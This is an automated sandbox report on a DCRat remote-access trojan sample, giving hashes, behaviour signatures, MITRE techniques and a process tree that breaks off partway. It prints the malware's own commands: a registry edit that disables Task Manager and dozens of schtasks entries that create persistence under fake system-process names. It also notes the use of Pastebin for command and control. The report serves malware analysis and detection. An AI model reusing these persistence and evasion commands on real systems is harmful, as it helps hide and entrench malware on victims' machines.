dcrat | 6230ef10cc3c6ff83a0ee0c5d87273ccae68c0f61883b9a218dc4e0f2b351cd5

Analysis

max time kernel
151s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2024, 11:32 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gay.exe
Size

1.1MB
MD5

088ef66571d8d08e8e8f56d9464d9a2b
SHA1

bb77ae41dd0cb709f3938f264463aa2aa6943071
SHA256

6230ef10cc3c6ff83a0ee0c5d87273ccae68c0f61883b9a218dc4e0f2b351cd5
SHA512

1cdfd8428c2fcb29205be394c9a55824e7a5407611fd694a52526196852956e824f57e76e332b0c8d984ea8577f0000dfb9d72550344a9ced8c13e8d74938ccc
SSDEEP

24576:U2G/nvxW3Ww0tVOOfWa+tZDfQgZ9E9SXNmgSG:UbA30VOOfUVvJ

Score

10^/10

dcrat evasion infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 45 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2160	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3964	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3076	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3752	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3848	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3564	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5000	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2640	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3936	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3332	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4820	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4248	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3324	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3304	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3748	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5196	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3480	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2912	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3980	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2932	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3100	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3392	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5216	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5124	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3516	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5784	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5172	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6056	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5212	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5056	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2988	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3700	1108	schtasks.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4072	1108	schtasks.exe	106

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral3/files/0x000c00000001ea83-10.dat	dcrat
behavioral3/memory/2068-12-0x0000000000DA0000-0x0000000000E80000-memory.dmp	dcrat

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	gay.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	comweb.exe

Executes dropped EXE 2 IoCs

pid	Process
2068	comweb.exe
1448	WmiPrvSE.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
48	pastebin.com
49	pastebin.com

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\lua\61a52ddc9dd915	comweb.exe
File created	C:\Program Files\Microsoft Office\Office16\RuntimeBroker.exe	comweb.exe
File created	C:\Program Files\Microsoft Office\Office16\9e8d7a4ca61bd9	comweb.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\csrss.exe	comweb.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\886983d96e3d3e	comweb.exe
File created	C:\Program Files\VideoLAN\VLC\lua\msedge.exe	comweb.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\lsass.exe	comweb.exe
File created	C:\Windows\Fonts\6203df4a6bafc7	comweb.exe
File created	C:\Windows\tracing\WaaSMedicAgent.exe	comweb.exe
File created	C:\Windows\tracing\c82b8037eab33d	comweb.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Creates scheduled task(s) 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3324	schtasks.exe
3304	schtasks.exe
3748	schtasks.exe
2912	schtasks.exe
3952	schtasks.exe
2988	schtasks.exe
2052	schtasks.exe
3076	schtasks.exe
1900	schtasks.exe
3392	schtasks.exe
5216	schtasks.exe
5160	schtasks.exe
2160	schtasks.exe
228	schtasks.exe
4248	schtasks.exe
3480	schtasks.exe
3700	schtasks.exe
1896	schtasks.exe
4768	schtasks.exe
3516	schtasks.exe
5000	schtasks.exe
3332	schtasks.exe
5196	schtasks.exe
5172	schtasks.exe
1096	schtasks.exe
4072	schtasks.exe
2908	schtasks.exe
4816	schtasks.exe
3848	schtasks.exe
4820	schtasks.exe
3980	schtasks.exe
5124	schtasks.exe
3752	schtasks.exe
2640	schtasks.exe
3936	schtasks.exe
2932	schtasks.exe
5784	schtasks.exe
1436	schtasks.exe
6056	schtasks.exe
3964	schtasks.exe
3564	schtasks.exe
3100	schtasks.exe
5212	schtasks.exe
5056	schtasks.exe
1812	schtasks.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	gay.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	comweb.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4404	reg.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2068	comweb.exe
2068	comweb.exe
2068	comweb.exe
2068	comweb.exe
1448	WmiPrvSE.exe
1448	WmiPrvSE.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2068	comweb.exe
Token: SeDebugPrivilege	1448	WmiPrvSE.exe
Token: SeDebugPrivilege	3392	firefox.exe
Token: SeDebugPrivilege	3392	firefox.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3392	firefox.exe
3392	firefox.exe
3392	firefox.exe
3392	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3392	firefox.exe
3392	firefox.exe
3392	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3392	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5136 wrote to memory of 5828	5136	gay.exe	99
PID 5136 wrote to memory of 5828	5136	gay.exe	99
PID 5136 wrote to memory of 5828	5136	gay.exe	99
PID 5828 wrote to memory of 1600	5828	WScript.exe	100
PID 5828 wrote to memory of 1600	5828	WScript.exe	100
PID 5828 wrote to memory of 1600	5828	WScript.exe	100
PID 1600 wrote to memory of 2068	1600	cmd.exe	104
PID 1600 wrote to memory of 2068	1600	cmd.exe	104
PID 2068 wrote to memory of 3504	2068	comweb.exe	153
PID 2068 wrote to memory of 3504	2068	comweb.exe	153
PID 3504 wrote to memory of 3944	3504	cmd.exe	155
PID 3504 wrote to memory of 3944	3504	cmd.exe	155
PID 1600 wrote to memory of 4404	1600	cmd.exe	156
PID 1600 wrote to memory of 4404	1600	cmd.exe	156
PID 1600 wrote to memory of 4404	1600	cmd.exe	156
PID 3504 wrote to memory of 1448	3504	cmd.exe	158
PID 3504 wrote to memory of 1448	3504	cmd.exe	158
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 4188 wrote to memory of 3392	4188	firefox.exe	167
PID 3392 wrote to memory of 5056	3392	firefox.exe	168
PID 3392 wrote to memory of 5056	3392	firefox.exe	168
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169
PID 3392 wrote to memory of 4916	3392	firefox.exe	169

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\gay.exe
"C:\Users\Admin\AppData\Local\Temp\gay.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5136
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\WebreviewRuntime\DA0G5NQf2P.vbe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:5828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\WebreviewRuntime\TaqdBAfZaG.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\WebreviewRuntime\comweb.exe
      "C:\WebreviewRuntime\comweb.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2068
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WPPuo7WD3O.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3504
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:3944
      - C:\WebreviewRuntime\WmiPrvSE.exe
        
        "C:\WebreviewRuntime\WmiPrvSE.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1448
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\odt\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Windows\Fonts\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Fonts\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Windows\Fonts\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office16\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\Office16\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Contacts\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\Contacts\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Contacts\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\All Users\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\WebreviewRuntime\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\WebreviewRuntime\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\WebreviewRuntime\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\WebreviewRuntime\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\WebreviewRuntime\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\WebreviewRuntime\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\WebreviewRuntime\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\WebreviewRuntime\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\WebreviewRuntime\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\WebreviewRuntime\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\WebreviewRuntime\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 14 /tr "'C:\WebreviewRuntime\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comwebc" /sc MINUTE /mo 6 /tr "'C:\odt\comweb.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comweb" /sc ONLOGON /tr "'C:\odt\comweb.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comwebc" /sc MINUTE /mo 11 /tr "'C:\odt\comweb.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\lua\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\lua\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\VLC\lua\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 9 /tr "'C:\Windows\tracing\WaaSMedicAgent.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Windows\tracing\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 9 /tr "'C:\Windows\tracing\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
1⤵
PID:4892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4188
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3392
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.0.615108731\683095078" -parentBuildID 20221007134813 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {477cc07a-b38c-487c-9c12-4d85a2150881} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 1976 1c1fa1fa458 gpu
    3⤵
    PID:5056
- - C:\Program Files\Mozilla Firefox\firefox.exe
